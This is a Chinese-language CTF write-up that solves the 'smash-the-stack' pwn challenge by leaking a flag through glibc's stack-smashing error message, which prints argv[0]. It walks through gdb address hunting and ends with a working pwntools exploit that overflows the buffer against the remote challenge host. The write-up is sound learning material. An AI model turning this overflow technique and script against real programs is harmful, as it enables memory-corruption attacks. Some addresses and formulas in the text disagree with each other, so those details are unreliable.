题目提示:stderr is available, beware of the output
拿到题目惯例检查下防护机制:
发下开启了NX和Canary 两个防护机制
结合题目给的提示 ,可以大胆的猜测这是一个smashesattck
通过Canary 的防护机制泄露信息
ida反编译观察程序逻辑
发现它打开了flag文件,所以我们可以将程序的argv[0]覆盖成flag地址来输出flag
原理:
程序开启了Canary防护机制后 ,会在栈的返回地址前放一个Canary ,当函数返回时,会先检查canary的值是否正确,
如果错误的话则会调用__stack_chk_fail 来打印错误
我们不关心这个报错,但是我们可以利用这个函数来打印我们想输出的内容
void __attribute__ ((noreturn)) __stack_chk_fail (void)
{
__fortify_fail ("stack smashing detected");
}
void __attribute__ ((noreturn)) internal_function __fortify_fail (const char *msg)
{
/* The loop is added only to keep gcc happy. */
while (1)
__libc_message (2, "*** %s ***: %s terminated\n",
msg, __libc_argv[0] ?: "");
}
__stack_chk_fail函数会打印argv[0]指针所指向的地址,所以我们只要把argv[0]覆盖成我们想输出的字符串的地址就可以打印出来了
要泄露出flag需要几个信息:
1.argv[0] 的地址 argv_add
2.buf 地址buf_add
3.flag的地址 flag_add
payload = 'a'*(argv_add - flag_add ) + p32(flag)
首先查找argv[0]的地址
在main函数头部下个断点
0xffffd288 所在地址存放着argv[0] 所以0xffffd0b4就是我们要找的地址
接下来找buf的地址:
在read()函数下个断点
当程序运行到read处时 单步进入函数 ,观察寄存器的值是否时read函数的参数
buf的地址就是0xffffcff8
最后用 find" flag{}" 找到flag地址
exp:
from pwn import *
local = False
context.log_level = "debug"
if local:
p=process('./smash-the-stack')
else:
p = remote('hackme.inndy.tw',7717)
def debug(address):
raw_input("debug")
gdb.attach(p,"b *"+address)
argv_add = 0xffffd0b4
buf_add = 0xffffcfdc
flag = 0x804a060
offset = argv_add - buf_add
payload = 'a'*188+p32(flag)
p.recv()
p.send(payload)
p.interactive()